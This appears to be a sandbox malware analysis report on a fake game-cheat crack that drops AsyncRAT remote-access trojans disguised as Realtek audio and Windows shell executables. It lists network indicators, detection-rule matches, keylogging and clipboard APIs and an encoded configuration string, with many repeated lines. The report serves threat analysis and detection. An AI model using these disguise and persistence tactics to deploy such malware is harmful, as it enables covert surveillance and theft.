                          Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                          Source: unknownHTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.5:49713 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 2.23.161.164:443 -> 192.168.2.5:49716 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.5:49723 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49725 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.5:49915 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:50071 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:50113 version: TLS 1.2

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

                          barindex
                          Source: Windows Shell Experience Host.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeCode function: 0_2_00404FCB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FCB

                          System Summary

                          barindex
                          Source: 2.0.Realtek HD Audio Universal Service.exe.b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 00000002.00000000.2043414047.00000000000B2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeFile created: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeJump to behavior
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeCode function: 0_2_0040310D EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,CoUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040310D
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeCode function: 0_2_00406B010_2_00406B01
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeCode function: 0_2_0040632A0_2_0040632A
                          Source: C:\Users\user\Desktop\EsgeCzT4do.exeCode function: 0_2_004047DC0_2_004047DC
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF848FD30E99_2_00007FF848FD30E9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF8490030E916_2_00007FF8490030E9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FF848FE30E925_2_00007FF848FE30E9
                          Source: SAM X CHEAT crack1.exe.0.drStatic PE information: No import functions for PE file found
                          Source: EsgeCzT4do.exe, 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSAM X CHEAT.exe( vs EsgeCzT4do.exe
                          Source: EsgeCzT4do.exe, 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSAM X CHEAT.exe( vs EsgeCzT4do.exe
                          Source: EsgeCzT4do.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                          Source: 2.0.Realtek HD Audio Universal Service.exe.b0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 3.0.Windows Shell Experience Host.exe.ca0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 00000002.00000000.2043414047.00000000000B2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: Realtek HD Audio Universal Service.exe.0.dr, KO990wGfSKii.csCryptographic APIs: 'TransformFinalBlock'
                          Source: Realtek HD Audio Universal Service.exe.0.dr, KO990wGfSKii.csCryptographic APIs: 'TransformFinalBlock'
                          Source: Realtek HD Audio Universal Service.exe.0.dr, 5q0REAlJVtJz.csCryptographic APIs: 'TransformFinalBlock'
                          Source: Windows Shell Experience Host.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: Windows Shell Experience Host.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: Windows Shell Experience Host.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                          Source: Windows Shell Experience Host.exe.0.dr, Settings.csBase64 encoded string: 'Kow1aMu0D2dDNZ8NTrCie7jwLa2Z+6pzcc6kS3bMHO2QzePrGGBLbeoYiAUBZ6qi'
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Realtek HD Audio Universal Service.exe.0.dr, OZNIQFUfJjhZdpP1Hmm8xrMrcXj4lnmT74XSGm7XT7Z8Hs6Tp1cVt1UH9OIqVn5WLGA4QE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: Windows Shell Experience Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
